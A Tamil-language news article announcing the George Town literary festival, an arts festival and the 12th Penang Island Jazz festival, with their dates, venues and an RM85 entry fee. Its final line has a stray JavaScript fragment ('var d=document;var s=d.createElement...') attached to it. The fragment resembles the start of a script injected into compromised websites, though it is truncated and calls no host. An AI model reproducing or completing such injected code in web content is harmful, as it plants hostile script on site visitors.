பினாங்கு மாநிலத்தில் கலை & கலாச்சார, இசை மற்றும் இலக்கிய விழா

பினாங்கு மாநில கலை & கலாச்சார, இசை மற்றும் இலக்கியத்தைப் பறைச்சாற்றும் வகையில் வருகின்ற 27 நவம்பர் மாதம் முதல் 6 டிசம்பர் வரை இம்மூன்று விழாக்களும் கொண்டாடப்படும். 10 நாட்கள் இடைவெளியில் ஜோர்ச்டவுன் இலக்கிய விழா, கலை விழா மற்றும் பினாங்கு தீவு இசை விழா என மூன்று விழாக்களும் மிக விமரிசையாக பினாங்கு மாநிலத்தில் கொண்டாடப்படும். மாநில அரசு ஏற்பாட்டில் நடைபெறும் ஜோர்ச்டவுன் இலக்கிய விழா வருகின்ற 27 முதல் 29 நவம்பர் மாதம் நடைபெறும். இவ்விழாவிற்கு அனைத்துலக எழுத்தாளர்கள் குறிப்பாக அமெரிக்கா, கனடா, பெல்ஜியம், சிங்கப்பூர் மற்றும் பல நாடுகளிலிருந்து வருகை புரிவர்.

பினாங்கு மாநிலத்தில் நடைபெறும் கலை & கலாச்சார, இசை மற்றும் இலக்கிய விழா பிரச்சூரம்
பினாங்கு மாநிலத்தில் நடைபெறும் கலை & கலாச்சார, இசை மற்றும் இலக்கிய விழா பிரச்சூரம்

சொல் மற்றும் இசை விழாவிற்கு இடையில் கலை விழா வருகின்ற 30 நவம்பர் முதல் 2 டிசம்பர் வரை நடைபெறும் என அறிவிக்கப்பட்டுள்ளது. இவ்விழாவில் பினாங்கு மாநில புகழ்ப்பெற்ற உணவு வகைகள், கலை, புகைப்படம் எடுத்தல், இசை, படக்காட்சி மற்றும் குழந்தைகளுக்கென விளையாட்டுப் போட்டிகள் எனப் பல நிகழ்வுகள் வரையறுக்கப்பட்டுள்ளன. இவ்விழா உள்நாட்டு கலைஞர்களின் திறமைகளை வெளிப்படுத்த சிறந்த மேடையாகத் திகழும்.

பினாங்கில் 12வது முறையாக இசை விழா வருகின்ற டிசம்பர் 3 முதல் 6-ஆம் திகதி வரை இடம்பெறும். இந்நிகழ்வில் உள்நாட்டு மட்டுமின்றி அனைத்துலக இசை கலைஞர்களும் கலந்து கொள்வர். பொது மக்கள் இவ்விழாவை நேரலையாகக் காண்பதற்கு பே வியூ தங்கும் விடுதி, ஆட் ரோக் தங்கும் விடுதி, திரோபிகல் சாவ்த் ஈஸ் ஆசியா தங்கும் விடுதிக்குச் செல்ல வேண்டும். இவ்விழாவில் கலந்து கொள்ள நுழைவுக்கட்டணம் ரிம85 செலுத்த வேண்டும்.var d=document;var s=d.createElement(‘script’);